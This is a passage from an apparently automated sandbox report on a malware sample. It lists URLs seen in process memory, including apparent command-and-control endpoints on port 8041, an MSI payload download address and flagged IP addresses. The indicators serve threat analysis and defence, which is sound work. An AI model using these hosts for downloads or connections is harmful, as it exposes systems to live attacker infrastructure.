                                                                                  http://x1.i.lencr.org/0rundll32.exe, 00000006.00000003.3197779910.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526696898.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2727327156.000001FF4CA51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3333625550.000001FF4CF10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2927135917.000001FF4CA50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2477041735.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2536162683.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2536131672.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2444803935.000001FF4CA4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://188.119.112.7/das.msi0~DFED22D1FE613BF34C.TMP.1.dr, ~DF07B80D9F27CBE04D.TMP.1.dr, ~DF01B5DC13092BA872.TMP.1.dr, ~DF28B4DE99F83A16D6.TMP.1.dr, ~DF59A0B4535E503852.TMP.1.dr, inprogressinstallinfo.ipi.1.drtrue
                                                                                    		unknown
                                                                                    https://bazarunet.com:8041/$Erundll32.exe, 00000006.00000003.3012131667.000001FF4CA78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://greshunka.com:8041/bazar.phpAm=rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149023230.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000008.00000000.2456761349.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3351439546.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://greshunka.com:8041/admin.phpirundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://greshunka.com:8041/admin.phpUNrundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://bazarunet.com:8041/rundll32.exe, 00000006.00000003.3030485400.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030793340.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://greshunka.com/rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://bazarunet.com:8041/frundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://isomicrotich.com/test/iexplorer.exe, 00000008.00000002.3346806877.00000000099B0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://greshunka.com:8041/Irundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://greshunka.com:8041/admin.phpprundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://isomicrotich.com/test/lexplorer.exe, 00000008.00000002.3352962994.000000000C933000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://wns.windows.com/)sexplorer.exe, 00000008.00000002.3346806877.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://tiguanin.com:8041/admin.phprundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://bazarunet.com:8041/bazar.php8rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://bazarunet.com:8041/bazar.phpllrundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://bazarunet.com/rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://isomicrotich.com/ECOMPARE.EXE.15Desktopexplorer.exe, 00000008.00000002.3352293048.000000000C642000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://bazarunet.com:8041/Urundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://tiguanin.com:8041/0Erundll32.exe, 00000006.00000003.3036865447.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030485400.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://isomicrotich.com/eEexplorer.exe, 00000008.00000002.3353202323.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://tiguanin.com:8041/rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030899621.000001FF4CA52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA37000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030793340.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://tiguanin.com/rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://isomicrotich.com/yEzexplorer.exe, 00000008.00000002.3353202323.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://tiguanin.com/)rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://greshunka.com:8041/net.com:8041/Pwrundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://r10.o.lencr.org0#rundll32.exe, 00000006.00000003.2927135917.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526696898.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2727327156.000001FF4CA51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2927135917.000001FF4CA50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2477041735.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://outlook.comexplorer.exe, 00000008.00000000.2452717662.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://greshunka.com:8041/bazar.phprundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149023230.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://tiguanin.com:8041/$Erundll32.exe, 00000006.00000003.3036865447.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030485400.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://bazarunet.com:8041/bazar.phprundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://isomicrotich.com/test/Gexplorer.exe, 00000008.00000002.3352962994.000000000C933000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://greshunka.com:8041/bazar.phpGNrundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://bazarunet.com:8041/net.com:8041/admin.phpfrundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://www.thawte.com/cps0/MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.drfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://188.119.112.7/das.msi1737443152311351380~DF93ACB531B807E54B.TMP.1.drtrue
                                                                                                                                                        		unknown
                                                                                                                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000008.00000000.2449894954.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3335475832.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094523211.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://tiguanin.com:8041/Yrundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://www.thawte.com/repository0WMSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.drfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://greshunka.com:8041/bazar.phpq#(rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://tiguanin.com:8041/admin.php.rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://greshunka.com:8041/admin.phprundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://www.advancedinstaller.comMSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.drfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://api.msn.com/explorer.exe, 00000008.00000000.2452717662.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://isomicrotich.com/test/3explorer.exe, 00000008.00000002.3346806877.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://greshunka.com:8041/rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://greshunka.com:8041/admin.phpGNrundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://tiguanin.com:8041/admin.php=rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://crl.vexplorer.exe, 00000008.00000002.3331052313.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2446927908.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://bazarunet.com:8041/&rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://bazarunet.com:8041/admin.phprundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036648885.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://bazarunet.com:8041/bazar.php~rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://bazarunet.com:8041/in.com:8041/admin.phprundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://tiguanin.com:8041/8~rundll32.exe, 00000006.00000002.3332514374.000001FF4CA42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://r10.i.lencr.org/0rundll32.exe, 00000006.00000003.2927135917.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526696898.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2727327156.000001FF4CA51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2927135917.000001FF4CA50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2477041735.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://bazarunet.com:8041/admin.php3#rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://tiguanin.com:8041/oQrundll32.exe, 00000006.00000003.3031010424.000001FF4CA63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030899621.000001FF4CA52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030793340.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown

                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                              Public IPs

                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                              188.119.112.7
                                                                                                                                                                                              		unknownRussian Federation
                                                                                                                                                                                              		50673SERVERIUS-ASNLfalse
                                                                                                                                                                                              188.114.96.3
                                                                                                                                                                                              		isomicrotich.comEuropean Union
                                                                                                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                                                                                                              82.115.223.39
                                                                                                                                                                                              		greshunka.comRussian Federation
                                                                                                                                                                                              		209821MIDNET-ASTK-TelecomRUtrue
                                                                                                                                                                                              80.78.24.30
                                                                                                                                                                                              		tiguanin.comCyprus
                                                                                                                                                                                              		37560CYBERDYNELRtrue

                                                                                                                                                                                              General Information

                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                              Analysis ID:1525184
                                                                                                                                                                                              Start date and time:2024-10-03 20:41:10 +02:00
                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                              Overall analysis duration:0h 7m 15s
                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                              Report type:full
                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                              Number of analysed new started processes analysed:10
                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                              Number of injected processes analysed:1
                                                                                                                                                                                              Technologies:
